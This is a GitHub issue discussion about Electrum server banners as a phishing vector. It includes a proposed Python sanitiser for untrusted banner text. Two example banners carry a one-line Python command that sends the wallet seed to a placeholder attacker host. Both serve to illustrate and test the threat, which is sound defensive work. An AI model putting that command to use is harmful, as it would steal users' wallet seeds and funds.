spesmilo / electrum

Electrum Bitcoin Wallet
https://electrum.org
MIT License

Server banners are "attacker-controlled" arbitrary text. Might be used for phishing. #5578

Open wartjugger opened 5 years ago

wartjugger commented 5 years ago

When a connection to a server is made, the server banner is displayed in the Console, sometimes containing instructions about updates or any other links.

This could potentially be another phishing vector.

I suggest adopting a standardized, simple server banner. Not free text sent from the server.

For example, name / IP, version. That's it.

gits7r commented 5 years ago

I disagree with a standardized, simple server banner. Because servers are run freely by volunteers, they might want to advertise their services or domain names etc. Or post whatever they want. I think this should stay as it is. Also, the banner can only be displayed in plain text and cannot send pop-ups like the "custom error messages sent from server" bug we had back then.

If we think this is a (less effective, but still) phishing vector, the best solution is to put a warning, like a standard header to any server banner, that will display on a colored background (similar to how we have the console warning: Do not paste here code you don't understand) and that will state not to follow links and update instructions, as those messages can be arbitrarily sent by the server and bla bla.

wartjugger commented 5 years ago

As we know it's fairly easy for a malicious actor to set up an Electrum server. I don't see why server banners should serve as a platform for advertisements. Many Electrum server banners are neutral and do not contain any customized banners. Most bitcoin nodes (unrelated to electrum) are run freely by volunteers without an ability to advertise. Similarly, Tor relays or bridges are run by volunteers without any option for advertisements. I don't see that a customized banner is an important part in the decision to run a server. In any case there is an option to donate to the server from the Help menu.

bauerj commented 5 years ago

Most users don't ever see those banners. The console tab is hidden by default.

JeremyRand commented 5 years ago

> I suggest adopting a standardized, simple server banner. Not free text sent from the server.
>
> For example, name / IP, version. That's it.

Speaking as a developer, I regularly rely on free-form banner text to find contact info for the operators of ElectrumX servers.

JeremyRand commented 5 years ago

> Tor relays or bridges are run by volunteers without any option for advertisements.

AFAIK Tor relays do have the ability to display freeform text in their descriptors, and many do so.

wartjugger commented 5 years ago

> > Tor relays or bridges are run by volunteers without any option for advertisements.
>
> AFAIK Tor relays do have the ability to display freeform text in their descriptors, and many do so.

I've never seen any text beyond a nickname. Can you support this claim? Where can this text be viewed? It's not displayed using arm or onioncircuits.

gits7r commented 5 years ago

Yes, the claim is true. Relay operators can put arbitrary extra data in their ContactInfo field as well as host a static HTML page (kind of like a banner) on their DirPort using the config option DirPortFrontPage.

I don't know if it can be viewed using onioncircuits. It's not visible from Tor Browser Bundle. Nor is the Electrum console visible by default though.

wartjugger commented 5 years ago

> Yes, the claim is true. Relay operators can put arbitrary extra data in their ContactInfo field as well as host a static HTML page (kind of like a banner) on their DirPort using the config option DirPortFrontPage.
>
> I don't know if it can be viewed using onioncircuits. It's not visible from Tor Browser Bundle. Nor is the Electrum console visible by default though.

Thanks for the information. From what I know this is used mainly for legal disclaimers and an address for complaints, a very common issue with exit relays. This information isn't used for advertisements, as evidenced by the fact that it doesn't appear in Tor Browser and requires separate action (looking up the IP of the relay and accessing it directly).

In any case I believe it's agreed that for honest server operators, having this banner as an advertisement platform isn't likely to be a main consideration in the decision of running or not running it. People don't choose Tor relays based on information on the DirPortFrontPage (and normally don't choose them at all, although that's technically possible) and don't choose Electrum servers based on a server banner.

Usage of server banners for direct advertisements is unsolicited advertising at best, and a potential phishing delivery vector at worst.

If anyone is looking for the contact details of the Electrum server operator they would normally be able to find them easily using the domain name (if the operator is interested in being found). If it's important to have it in the banner for some reason, then simple contact details such as an email could be one of the fields in a standardized banner.

Electrum console isn't visible by default but it's probably used by enough people for this to be added: https://github.com/spesmilo/electrum/pull/3700

bauerj commented 5 years ago

This warning was added to prevent users from following instructions to run code that steals their funds.

wartjugger commented 5 years ago

> This warning was added to prevent users from following instructions to run code that steals their funds.

That's well understood. In the same way, a server banner could negate this by including an instruction to run a short script that will steal their funds.

Welcome to ElectrumX version 123!
For best performance, start by running the following:
import requests; requests.get("http://we_steal_your_coins.com/?"+getseed()) 

This is a simplistic example of course.

Consider this: Fact 1 - if verified correctly, the Electrum client isn't malicious. Fact 2 - a user has no way to verify if an ElectrumX server is malicious or not.

Why allow any non-standard communication? Didn't users lose enough money due to malicious server messages, served by the client? This is simply another similar security hole.

JeremyRand commented 5 years ago

> From what I know this is used mainly for legal disclaimers and an address for complaints, a very common issue with exit relays.

That is definitely not the only use case. A significant set of Tor relays list Bitcoin donation addresses in their descriptor, and there are lots of reasons why someone might want to contact a relay operator besides sending legal threats. (In particular, if a relay is misconfigured in a way that makes it harmful to the network, contacting the relay operator is desirable; this is also the reason I regularly need to look up contact info for ElectrumX servers.)

> If anyone is looking for the contact details of the Electrum server operator they would normally be able to find them easily using the domain name (if the operator is interested in being found)

And I suppose you expect DNS WHOIS queries to be able to turn up contact info such as Bitmessage or Cwtch addresses, or OpenPGP pubkeys, or the variety of other ways that users might want to be contacted besides a simple email address? What about servers that aren't accessed via the DNS, e.g. servers accessed via an onion service or an IP address?

> If it's important to have it in the banner for some reason, then simple contact details such as an email could be one of the fields in a standardized banner.

Again, expecting that all server operators are okay with exclusively using email to accept contacts is unreasonable.

> That's well understood. In the same way, a server banner could negate this by including an instruction to run a short script that will steal their funds.

Users don't randomly access the console of their own accord. The scams were happening because attackers were using social engineering to get the user to open the console. The fact that users could be scammed by a social engineering attack via a non-Electrum channel does not imply in any way that users could be scammed by the Electrum protocol banner. And in any event, the warning already says not to type commands you don't understand. If a user disobeys that advice because of something in a server banner, they really should have read the advice before clicking through it. (If you can think of a wording patch for that warning that reduces the risk of the user disregarding it in this case, feel free to suggest one.)

wartjugger commented 5 years ago

> > From what I know this is used mainly for legal disclaimers and an address for complaints, a very common issue with exit relays.
>
> That is definitely not the only use case. A significant set of Tor relays list Bitcoin donation addresses in their descriptor, and there are lots of reasons why someone might want to contact a relay operator besides sending legal threats. (In particular, if a relay is misconfigured in a way that makes it harmful to the network, contacting the relay operator is desirable; this is also the reason I regularly need to look up contact info for ElectrumX servers.)
>
> > If anyone is looking for the contact details of the Electrum server operator they would normally be able to find them easily using the domain name (if the operator is interested in being found)
>
> And I suppose you expect DNS WHOIS queries to be able to turn up contact info such as Bitmessage or Cwtch addresses, or OpenPGP pubkeys, or the variety of other ways that users might want to be contacted besides a simple email address? What about servers that aren't accessed via the DNS, e.g. servers accessed via an onion service or an IP address?
>
> > If it's important to have it in the banner for some reason, then simple contact details such as an email could be one of the fields in a standardized banner.
>
> Again, expecting that all server operators are okay with exclusively using email to accept contacts is unreasonable.
>
> > That's well understood. In the same way, a server banner could negate this by including an instruction to run a short script that will steal their funds.
>
> Users don't randomly access the console of their own accord. The scams were happening because attackers were using social engineering to get the user to open the console. The fact that users could be scammed by a social engineering attack via a non-Electrum channel does not imply in any way that users could be scammed by the Electrum protocol banner. And in any event, the warning already says not to type commands you don't understand. If a user disobeys that advice because of something in a server banner, they really should have read the advice before clicking through it. (If you can think of a wording patch for that warning that reduces the risk of the user disregarding it in this case, feel free to suggest one.)

Contacting ElectrumX server operators issue: I'm not expecting anyone to use any particular way; what I do expect is that when operators want to be contacted, they'll make their details easily available. And if it's important for you to find those details, you'll manage to do it without having that info included in the server banners. I wonder how you cope today with all those servers that don't have operator details in the banners.

I believe my suggestion is important. I have shown one trivial way (attackers will be more creative, you can be sure) a malicious server could today scam users with misleading messages. The project has the power to prevent this; I did not see here a convincing argument why it shouldn't do so.

A lot of the anger users had in the massive "Electrum 4" phishing attack wasn't just about their losing the money, but because it seemed as if the attack and the instruction came from Electrum, that's why it was so easy for them to trust it. Many people didn't make the distinction between Electrum client and servers even after the issue was explained. It is "Electrum". In this case, while the issue I presented admittedly poses a smaller threat, there is a similarity. Here too it may seem to a user the attack comes from within the client. He gets instructions (or links) from within the wallet.

JeremyRand commented 5 years ago

For anyone who is interested in a constructive discussion... would it be potentially desirable to move the banner from the Console to some other context, which might be less likely to confuse users? Does another UI context exist that's less likely to confuse users? It's not totally clear to me why the Python console and the banner are in the same tab to begin with... if nothing else it causes UX disruption if I'm typing a console command and the server switches while I'm typing.

wartjugger commented 5 years ago

Getting into a discussion about the different ways you may or may not contact a server operator who's interested in being contacted has very little relevance to the security issue I have raised here, even more so when the common case is that contact details currently do not appear in most banners (a point you conveniently chose to ignore).

> It's not totally clear to me why the Python console and the banner are in the same tab to begin with... if nothing else it causes UX disruption if I'm typing a console command and the server switches while I'm typing.

Finally some constructive comments!

JeremyRand commented 5 years ago

> even more so when the common case is that contact details currently do not appear in most banners (a point you conveniently chose to ignore).

I'm curious, do you actually maintain an Electrum client? Because I do, and I've used the banner contact info to contact operators of servers that were misbehaving. The fraction of servers you sampled that use that feature is quite immaterial to that reality.

Anyway, since I haven't seen any developers express any interest in this issue, I'm not going to bother spending any more time on this issue unless I see another developer do so first.

bauerj commented 5 years ago

Please try and keep this discussion on topic.

Any suggestions on how to keep displaying the banner somewhere while making clear this is arbitrary text sent by the server?

wartjugger commented 5 years ago

> Any suggestions on how to keep displaying the banner somewhere while making clear this is arbitrary text sent by the server?

I don't think a freetext banner is very important, and it is in fact a security risk since a server should be assumed potentially malicious, but if considered desirable by others for some reason a better location may be the Tools -> Network window. Either as a "View banner" right-click option in the Overview tab's "Connected node" table, or at the Server tab.
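Whatever location the banner ends up in, the two mitigations discussed in this thread (a fixed client-controlled header saying the text is unverified, plus treating the banner as untrusted input) can be implemented as a small rendering step. The following is an added example written for this issue, not Electrum's own code: the header wording, the length limits and the heuristics are assumptions. It strips terminal escape sequences and control/format characters (so a banner cannot recolour or clear a terminal-style console or hide text with zero-width or bidi characters), caps the size, and marks lines that carry URLs or look like Python statements, as in the `import requests; ...` example above, without ever making them clickable or executable.

```python
import re
import unicodedata

# Fixed header prepended by the client. The wording is an assumption for this
# example, not Electrum's actual text.
BANNER_HEADER = (
    "[Server banner: arbitrary text sent by the server, not verified by Electrum. "
    "Do not follow update instructions, links or commands from it.]"
)

# Size limits chosen for the example (hypothetical values).
MAX_BANNER_LINES = 20
MAX_LINE_CHARS = 200

# ANSI CSI escape sequences: ESC '[' parameters, intermediates, final byte.
_ANSI_CSI_RE = re.compile(r"\x1b\[[0-9;?]*[ -/]*[@-~]")

# Heuristics for lines that ask the user to act: a URL, or a Python-looking
# import statement such as the banner quoted in this thread.
_URL_RE = re.compile(r"(?i)\b(?:https?|ftp)://\S+")
_CODE_RE = re.compile(r"^\s*(?:import\s+\w|from\s+\w+\s+import\b)")


def strip_control(text: str) -> str:
    """Remove escape sequences and every control/format character.

    Newline and tab are kept; everything else in Unicode category C*
    (C0/C1 controls, zero-width joiners, bidi overrides, unassigned,
    surrogates, private use) is dropped.
    """
    text = _ANSI_CSI_RE.sub("", text)
    return "".join(
        ch for ch in text
        if ch in "\n\t" or not unicodedata.category(ch).startswith("C")
    )


def is_suspicious_line(line: str) -> bool:
    """True if the line carries a URL or looks like a Python import."""
    return bool(_URL_RE.search(line) or _CODE_RE.match(line))


def render_banner(raw: str) -> str:
    """Return the plain text a client would display for an untrusted banner."""
    clean = strip_control(raw).rstrip("\n")
    lines = clean.split("\n")[:MAX_BANNER_LINES]
    out = [BANNER_HEADER]
    for line in lines:
        line = line[:MAX_LINE_CHARS]
        if is_suspicious_line(line):
            # Flag the line; the URL or code stays inert plain text.
            out.append("  [unverified content] " + line)
        else:
            out.append("  " + line)
    return "\n".join(out)


# Constructed sample banner modelled on the one quoted in this issue
# (placeholder domain; colour escapes and a zero-width space added on purpose).
SAMPLE_BANNER = (
    "Welcome to ElectrumX version 123!\n"
    "For best performance, start by running the following:\n"
    "\x1b[31mimport requests; requests.get(\"http://phishing.example/?\"+getseed())\x1b[0m\n"
    "Donate: bc1qexample\u200b\n"
)

if __name__ == "__main__":
    print(render_banner(SAMPLE_BANNER))
```

The point of the header is that it is written by the client, not the server, so a banner cannot remove or imitate it; the sanitising step only makes the text harmless to display and does not try to judge whether the operator is honest.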

wartjugger commented 5 years ago

I think this is a good general rule (better to avoid arbitrary text rather than change its location / context): https://github.com/spesmilo/electrum/issues/4968#issuecomment-450218389

SomberNight commented 5 years ago

That rule might sound good in principle but is rarely the case in practice: https://github.com/bitcoin/bitcoin/issues/16154